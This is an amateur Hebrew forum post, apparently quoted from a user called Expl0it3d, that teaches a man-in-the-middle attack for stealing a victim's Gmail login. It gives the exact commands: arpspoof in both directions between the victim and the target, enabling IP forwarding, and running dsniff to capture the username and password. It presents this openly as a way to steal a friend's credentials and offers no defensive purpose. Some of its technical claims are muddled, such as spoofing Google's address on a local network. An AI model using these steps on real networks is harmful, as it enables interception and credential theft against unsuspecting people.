מדריך MITM Attack
שלום לכולם,כאן ספיר מאבטח מידע ומנהל קבוצת ה-meta_users!
פה אני ילמד אתכם איך לגנוב מידע בעזרת MITM Attack אז זאת מתקפה קלה מאוד לדעתי ואני מאוד אוהב אותה...אז נכנסים ל-BackTrack ואז הולכים לconsole ורושמים שם:
ifconfig eth0 up
dhclient eth0
הפקודות האלו מפעילות את הרשת...עכשיו אנחנו רוצים לעשות MITM נגיד בית ידיד שלי IP1 לגוגל כדי לגנות לו את הGMAIL...אז כדי למצוא אייפי של אתר רושמים Ping www.site.blabla במקום ה-www.site.blabla רושמים את האתר...ועכשיו רוצים לעבוד עליהם ככה שלגוגל נגיד שאנחנו IP1 ולIP1 שאנחנו גוגל...אז בשביל זה נרשום:
arpspoof -t IP1 googleIP
arpspoof -t googleIP IP1
כל פקודה בחלון נפרד ואז מורידים את החלונות למעטה ולא נוגעים בהם!
במקום ה-googleIP את האייפי של גוגל ובמקום ה-IP1 את האייפי של הקורבן...
עכשיו רושמים:
echo 1 > /proc/sys/net/ipv4/ip_forward
ואז:
dsniff
ואז אומרים לקורבן להתחבר לגימייל...ברגע שהוא יתחבר זה ירשום לכם username ו-password אבל לא יביא לכם את הנתונים כי הם עוד לא הגיעו,הם יגיעו רק כאשר הוא יתנתק!
מקווה שעזרתי! תהנו
סליחה שרשמתי מקודם שאני מנהל של אבטחת מידע פשוט פרסמתי את זה גם בפורום אחר שבו אני המנהל...
ציטוט ההודעה
נכתב במקור על ידי Expl0it3d
